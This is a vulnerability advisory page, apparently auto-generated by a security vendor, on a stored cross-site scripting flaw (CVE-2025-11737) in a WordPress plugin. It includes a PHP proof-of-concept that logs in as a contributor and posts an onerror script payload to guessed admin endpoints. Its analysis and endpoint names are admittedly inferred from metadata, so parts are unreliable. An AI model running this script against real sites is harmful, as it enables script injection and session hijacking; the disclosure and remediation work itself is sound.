Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-11737: VK All in One Expansion Unit <= 9.112.3 – Authenticated (Contributor+) Stored Cross-Site Scripting via SNS Title (vk-all-in-one-expansion-unit)

CVE ID CVE-2025-11737
Plugin vk-all-in-one-expansion-unit
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 9.112.3
Patched Version
Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-11737 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the VK All in One Expansion Unit WordPress plugin. Attackers with Contributor-level or higher permissions can inject malicious scripts via the ‘vkExUnit_sns_title’ parameter. The injected scripts execute in the context of any user viewing the compromised page, leading to client-side attacks.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping for the ‘vkExUnit_sns_title’ parameter. The CWE-79 classification confirms improper neutralization of input during web page generation. The vulnerability description states the issue exists in all versions up to 9.112.3. Without a code diff, Atomic Edge concludes the plugin likely fails to apply adequate sanitization functions like `sanitize_text_field` during input processing or `esc_attr` during output rendering for this specific parameter.

Exploitation requires an authenticated session with at least Contributor-level access. The attacker likely submits a crafted POST request containing malicious JavaScript within the ‘vkExUnit_sns_title’ parameter. This parameter is associated with a social sharing or meta title feature. The endpoint is probably an AJAX handler (`admin-ajax.php`) or a POST request to an admin page that saves plugin settings. A payload such as `` would be typical for proof-of-concept. The script stores persistently and triggers when any user loads a page that outputs this title.

The remediation in version 9.112.4 likely involves implementing proper input validation and output escaping. The fix should sanitize the ‘vkExUnit_sns_title’ parameter on receipt using WordPress core functions like `sanitize_text_field` or `wp_kses`. It must also escape the parameter on output in frontend templates using functions like `esc_attr` or `esc_html`. This dual-layer approach follows WordPress security best practices for neutralizing XSS vectors.

Successful exploitation allows attackers to perform actions within the victim’s browser session. This can lead to session hijacking, content defacement, or redirection to malicious sites. For administrators, this could facilitate privilege escalation by stealing cookies or manipulating administrative interfaces. The stored nature amplifies impact, as the payload executes for all future visitors until removed. The CVSS vector scores a 6.4 with Scope:Changed, indicating the vulnerability can affect components beyond the plugin’s own security scope.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-11737 - VK All in One Expansion Unit <= 9.112.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via SNS Title
<?php
/**
 * Proof of Concept for CVE-2025-11737.
 * This script simulates an authenticated attack by a Contributor-level user.
 * It targets the 'vkExUnit_sns_title' parameter, which is inferred to be part of a plugin settings update mechanism.
 * The exact endpoint is not confirmed; this PoC assumes a common WordPress AJAX pattern.
 * Replace $target_url, $username, and $password with valid credentials for testing.
 */

$target_url = 'https://example.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload for stored XSS. This will execute when a user views a page containing the injected title.
$malicious_title = '<img src=x onerror=alert('Atomic Edge XSS via vkExUnit_sns_title')>';

// Initialize cURL session for WordPress login to obtain authentication cookies.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);

// Check login success by looking for a dashboard redirect or absence of login form.
if (strpos($login_response, 'wp-admin') === false && strpos($login_response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Atomic Edge research assumes the plugin uses an AJAX handler or admin POST endpoint to save settings.
// Two common patterns are tested. The first targets admin-ajax.php with a plugin-specific action.
$ajax_endpoint = $target_url . '/wp-admin/admin-ajax.php';
$ajax_params = array(
    'action' => 'vk_exunit_update_sns_settings', // Inferred action name based on plugin slug
    'vkExUnit_sns_title' => $malicious_title,
    'nonce' => '' // Nonce would be required; its absence or validation bypass is part of the vulnerability context.
);

curl_setopt($ch, CURLOPT_URL, $ajax_endpoint);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_params));
$ajax_response = curl_exec($ch);

// If the AJAX attempt fails, try a direct admin POST to a plugin options page as an alternative.
if (strpos($ajax_response, 'success') === false && strpos($ajax_response, 'updated') === false) {
    $admin_post_url = $target_url . '/wp-admin/admin-post.php';
    $admin_post_params = array(
        'action' => 'vk_exunit_save_options',
        'vkExUnit_sns_title' => $malicious_title
    );
    curl_setopt($ch, CURLOPT_URL, $admin_post_url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($admin_post_params));
    $admin_response = curl_exec($ch);
    echo 'Admin POST attempt completed. Check response for success indicators.n';
    echo 'Response length: ' . strlen($admin_response) . 'n';
} else {
    echo 'AJAX request submitted. Payload may be stored.n';
    echo 'Response snippet: ' . substr($ajax_response, 0, 200) . 'n';
}

curl_close($ch);
// Clean up cookie file
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School